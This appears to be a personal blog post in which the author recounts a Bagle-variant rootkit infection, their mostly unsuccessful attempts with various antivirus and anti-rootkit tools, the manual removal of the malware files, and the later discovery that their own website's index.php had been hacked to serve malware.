Into the Void

It would, of course, would have been far easier to reformat my hard drive.

The problem seems to be a bagel variant and has something to do with files named
C:\WINDOWS\system32\drivers\hidr.exe
C:\WINDOWS\system32\drivers\srosa.sys
and possibly an infected NETWAITING.EXE file.

I have tried multiple rootkit detection and removal programs with varying degrees of success.

McAfee Security Center says that no parts of my McAfee software are enabled. It says that parts of the software are missing and I have to reinstall.

McAfee Rootkit Detective 1.1 flagged hidr.sys and said it would remove it, but it didn’t.

F-Secure Online Virus Scanner is unable to download all its files - I suspect the bug is blocking them. Their Blacklight program has been integrated into the new scanner. Oh well.

AVG Free won’t install - it can’t find one of its installation files - I assume the malware is deleting it. AVG is my number one favorite free antivirus program.

Panda Anti-rootkit, available from Download.com, found the files and renamed one of them, but the problem came back next boot. Panda offers a number of free tools too, including an online scanner called ActiveScan and a beta online scanner named nano-scan. The big thing they offer is repair utilities for specific infections.

EliBagle v10.75 located the files and a registry entry. I rebooted in safe mode. I deleted the files. I deleted the registry entry. And just to be certain, I deleted the preload file for hidr.exe.

At this point IE is no longer going out to strange web sites. I can only hope that it was unable to download something even worse while McAfee was down.

My McAfee subscription is still active, but I haven’t decided whether to reinstall or to switch to something cheaper and just as useless.

Technorati: bagel+variant rootkit Panda+Anti-rootkit Panda+ActiveScan Rootkit+Detective F-Secure trojan

Found this f*cker at the bottom of index.php. The file was in the top level and IE kindly downloaded it for me. It’s late, it’s my own site, and I wasn’t paying attention. I ran it. I don’t know what’s going to happen. I’m running a McAfee scan - it didn’t flag the executable - and I suppose I should grab AdAware or Spybot S&D or both.

Now if you’ll excuse me, I’m going to go boil my laptop.

Update 11/19:
IE went out to a bunch of sites this morning looking for a page called hltraff.php. Not good. It also killed McAfee and won’t let me do a system restore. I found the installation and as I looked at the file it disappeared from the directory. I guess I’m going to have to reformat and start over.

Update 11/25:
I am so pwned.

First access of this file - the first person who was infected by my site - gives me an idea when it was uploaded to my server.

That’s someone who my webpage may have infected. After that the accesses come several times a page.

This is the ftp access where the hacker uploaded the infection and the hacked index.php:

66.246.252.53 resolves to sr178.2dayhost.com - that’s the hacker.
69.141.48.56 resolves to c-69-141-48-56.hsd1.pa.comcast.net - that’s me.